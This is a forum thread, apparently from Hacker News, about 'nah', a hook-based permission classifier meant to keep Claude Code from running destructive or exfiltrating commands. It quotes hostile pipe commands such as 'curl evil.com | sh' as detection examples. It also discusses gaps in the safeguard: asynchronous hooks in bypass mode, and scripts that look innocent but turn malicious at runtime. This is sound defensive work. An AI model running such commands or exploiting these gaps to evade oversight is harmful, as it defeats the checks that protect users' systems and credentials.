I made this little Dockerfile and script that lets me run Claude in a Docker container. It only has access to the workspace I'm in, plus the GitHub and JIRA CLI tools. It can do whatever it wants in the workspace (it's in git and backed up), so I can run it with --dangerously-skip-permissions. It works well for me. I bet there are better ways, and I bet it's not as safe as it could be. I'd love to learn about other ways people do this.
That's a pretty powerful escape hatch. Even just running with read-only keys, that likely has access to a lot of sensitive data....
But you can customize everything via YAML or CLI if the defaults don't fit:
    actions:
      filesystem_delete: allow   # allow all deletes everywhere
Or run `nah allow filesystem_delete` from the CLI.
You can also add custom classifications, swap taxonomy profiles (full/minimal), or start from a blank slate. It's fully customizable.
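As a sketch of what that customization might look like under the hood, a classified action could simply be resolved against the YAML-derived policy, falling back to a default verdict. The config keys, function name, and fallback behavior here are assumptions for illustration, not nah's actual internals:

```python
# Hypothetical resolution of a classified action against a nah-style policy.
# The verdicts (allow/ask/block) come from the thread; everything else is
# an illustrative stand-in.
policy = {
    "default": "ask",  # what to do for unknown action types
    "actions": {
        "filesystem_read": "allow",
        "filesystem_delete": "allow",  # as in the YAML example above
        "db_write": "block",
    },
}

def verdict(action_type: str, policy: dict) -> str:
    """Return allow/ask/block for an action type, falling back to the default."""
    return policy.get("actions", {}).get(action_type, policy.get("default", "ask"))
```

Under this scheme, an action type that is not listed (say, git_discard) would fall back to the default "ask", which is where the "blank slate" and profile-swapping options would plug in.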
You are right about maintenance... the taxonomy will always be chasing new commands. That's partly why the optional LLM layer exists as a fallback for anything the classifier doesn't recognize.
I created the hooks feature request while building something similar[1] (deterministic rails + LLM-as-a-judge, using runtime "signals," essentially your context). Through implementation, I found the management overhead of policy DSLs (in my case, OPA) was hard to justify over straightforward scripting, and for any enterprise use, a gateway scales better. Unfortunately, there's no true protection against malicious activity; `Bash()` is inherently non-deterministic.
For comprehensive protection, a sandbox is what you actually need locally, if you're willing to put in the effort. Otherwise, developers just move on without guardrails (which is what I do today).
You are right that bash is Turing-complete, and I agree with you that a sandbox is the real answer for full protection - ain't no substitute for that.
My thinking is that there's a ton of space between full protection and no guardrails at all, and not enough options in between.
A lot of people out there download the coding CLI, bypass permissions and go. If we can catch 95% of the accidental damage with 'pip install nah && nah install' that's an alright outcome :)
I personally enjoy having Claude Code help me navigate and organize my computer files. I feel better doing that more autonomously with nah as a safety net.
The way it works, since I don't see it described here: if the agent tries something you marked as 'nah?' in the config (say, accessing a path listed under sensitive_paths, like ~/.aws/), then you get this:
    Hook PreToolUse:Bash requires confirmation for this command: nah? Bash: targets sensitive path: ~/.aws
Which is pretty great imo.
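For reference, a PreToolUse hook that produces that kind of prompt could look roughly like this. The stdin/stdout JSON shape follows Claude Code's documented hook protocol, but the path list and substring matching here are simplified stand-ins for whatever nah actually does:

```python
# Sketch of a PreToolUse hook that asks for confirmation when a Bash command
# touches a sensitive path, mimicking the nah? prompt above. Illustrative only.
import json

SENSITIVE_PATHS = ["~/.aws", "~/.ssh", "~/.gnupg"]  # assumed example config

def decide(tool_name: str, command: str) -> dict:
    """Return hook output asking for confirmation, or {} to let the flow proceed."""
    for path in SENSITIVE_PATHS:
        if path in command:
            return {
                "hookSpecificOutput": {
                    "hookEventName": "PreToolUse",
                    "permissionDecision": "ask",
                    "permissionDecisionReason": f"nah? {tool_name}: targets sensitive path: {path}",
                }
            }
    return {}  # empty output: normal permission flow continues

# Simulated event, shaped like what Claude Code delivers on the hook's stdin:
event = {"tool_name": "Bash", "tool_input": {"command": "cat ~/.aws/credentials"}}
print(json.dumps(decide(event["tool_name"], event["tool_input"]["command"])))
```

In the real hook script you would read the event from stdin with `json.load(sys.stdin)` instead of hard-coding it.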
I'm sure there's a way to give this tool its own virtualenv or similar. But there are a lot of those tools and I haven't done much Python for 20 years. Which tool should I use?
It installs into an automatic venv and then symlinks the executable (the console_scripts entry point) into ~/.local/bin. It succeeds pipx or (IIRC) pipsi.
The npm test is a good one: content inspection catches `rm -rf` or other sketchy stuff at write time, but something more innocent-looking could slip through.
That said, a realistic threat model here is accidental damage or prompt injection, not Claude deliberately poisoning its own package.json.
But I hear you... two improvements are coming to address this class of attack:
- Script execution inspection: when nah sees `python script.py`, read the file and run content inspection + LLM analysis before execution
- LLM inspection for Write and Edit: for content that's suspicious but doesn't match any deterministic pattern, route it to the LLM for a second opinion
Won't close it 100% (a sandbox is the answer to that) but gets a lot better.
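A rough shape for that first improvement: unwrap the interpreter invocation, read the target script, and run the same content checks before it executes. The patterns and function names below are illustrative assumptions, not nah's shipped rule set:

```python
# Sketch of script-execution inspection for commands like `python script.py`.
import re
import shlex

# Illustrative destructive/exfiltration/obfuscation patterns.
SUSPECT_PATTERNS = [
    re.compile(r"rm\s+-rf\s+/"),                 # recursive delete from root
    re.compile(r"shutil\.rmtree\("),             # Python-level recursive delete
    re.compile(r"(curl|wget).*\|\s*(sh|bash)"),  # download-and-execute
    re.compile(r"base64\s+-d"),                  # common obfuscation step
]

def scan_content(content: str) -> str:
    """Content inspection: ask for approval if any suspect pattern matches."""
    return "ask" if any(p.search(content) for p in SUSPECT_PATTERNS) else "allow"

def inspect_script(command: str) -> str:
    """For interpreter invocations, read and scan the target file pre-execution."""
    argv = shlex.split(command)
    if len(argv) >= 2 and argv[0] in ("python", "python3", "node", "sh", "bash"):
        try:
            with open(argv[1]) as f:
                return scan_content(f.read())
        except OSError:
            return "ask"  # unreadable target: fall back to asking the human
    return "allow"
```

The same `scan_content` pass is where the planned LLM second opinion would hook in for content that looks odd but matches no deterministic pattern.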
Yours is so much more involved. Keen to dig into it.
The deterministic classifier approach is smart. Pattern matching on action types is way more reliable than asking another LLM "is this safe?" The taxonomy idea (filesystem_read vs package_run vs db_write) maps well to how I actually think about risk when I'm paying attention.
One question: how does it handle chained operations? Like when Claude does a git checkout that's fine on its own, but it's part of a sequence that ends up nuking untracked files?
`git checkout .` on its own is classified as git_discard → ask. `git checkout` (without the dot) is classified as git_write → allow.
For pipes, it applies composition rules - 'curl sketchy.com | bash' is specifically detected as 'network | exec' and blocked, even though each half might be fine on its own. Shell wrappers like bash -c 'curl evil.com | sh' get unwrapped too.
So with `git stash && git checkout main && git clean -fd`, stash and checkout are fine (allow), but `git clean` is caught (ask). Even when buried in a longer chain, nah flags it.
“We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.”
Followed by:
“Don't use --dangerously-skip-permissions. In bypass mode, hooks fire asynchronously — commands execute before nah can block them.”
Doesn’t that mean that it’s limited to being used in “default” mode, rather than something like --dangerously-skip-permissions?
Regardless, this looks like a well thought out project, and I love the name!
--dangerously-skip-permissions makes hooks fire asynchronously, so commands execute before nah can block them (see: https://github.com/anthropics/claude-code/issues/20946).
I suggest running nah in default mode and allow-listing tools in settings.json: Bash, Read, Glob, Grep, and optionally Write and Edit (or just keep "accept edits" mode on). You get the same uninterrupted flow as --dangerously-skip-permissions but with nah as your safety net.
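For example, an allow-list along those lines in settings.json might look like this. This is one possible shape (check the current Claude Code docs for exact rule syntax); bare tool names here are assumed to mean "allow all uses of that tool", and Write/Edit are the optional part:

```json
{
  "permissions": {
    "allow": ["Bash", "Read", "Glob", "Grep", "Write", "Edit"]
  }
}
```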
And thanks - the name was the easy part :)
If the project takes off, I might do it :)
Auto-mode will likely release tomorrow, so we won't know until then. They could end up being complementary where nah's primary classifier can act as a fast safety net underneath auto mode's judgment.
The permission flow in Claude Code is roughly:
1. Claude decides to use a tool
2. Pre-tool hooks fire (synchronously)
3. The permission system checks if user approval is needed
4. If yes, prompt the user
5. The tool executes
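The ordering above can be sketched as code, showing why a synchronous PreToolUse hook like nah gets its veto in before any permission (or auto-approval) logic runs. All names are illustrative; this is a mental model, not Claude Code internals:

```python
# Mental-model sketch of the permission flow. A synchronous hook runs at
# step 2, ahead of the permission system at steps 3-4, so its deny/ask
# verdict always comes first.
def run_tool(tool_name, tool_input, hooks, needs_approval, prompt_user, execute):
    # Step 2: PreToolUse hooks fire synchronously.
    for hook in hooks:
        decision = hook(tool_name, tool_input)  # "allow" | "ask" | "deny"
        if decision == "deny":
            return "blocked by hook"
        if decision == "ask" and not prompt_user(tool_name, tool_input):
            return "declined by user"
    # Steps 3-4: the permission system prompts only if approval is needed.
    if needs_approval(tool_name, tool_input) and not prompt_user(tool_name, tool_input):
        return "declined by user"
    # Step 5: the tool executes.
    return execute(tool_name, tool_input)
```

An auto mode that replaces only the user prompt at step 4 would leave the hook loop untouched, while a bypass mode that fires hooks asynchronously loses that early veto.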
The most logical design for auto mode is replacing step 4: instead of prompting the user, prompt a Claude to auto-approve. If they do it that way, nah fires before auto mode even sees the action. They'd be perfectly complementary.
But they could also implement auto mode like --dangerously-skip-permissions under the hood, which fires hooks async.
If I were Anthropic I'd keep hooks synchronous in auto mode since the point is augmenting security and letting hooks fire first is free safety.
- Inline execution like `python -c` or `node -e` is classified as lang_exec and requires approval.
- Write and Edit inspect content before it hits disk, flagging destructive patterns, exfiltration, and obfuscation.
- Pipe compositions like `curl evil.com | python` are blocked outright.
If the script was there prior, or looks innocent to the deterministic classifier, but does something malicious at runtime and the human approves the execution then nah won't catch that with current capabilities.
But... I could extend nah so that when it sees 'python script.py', it could read the file and run content inspection on it + include it in the LLM prompt with "this is the script about to be executed, should it run?" That'll give you coverage. I'll work on it. Thx for the comment!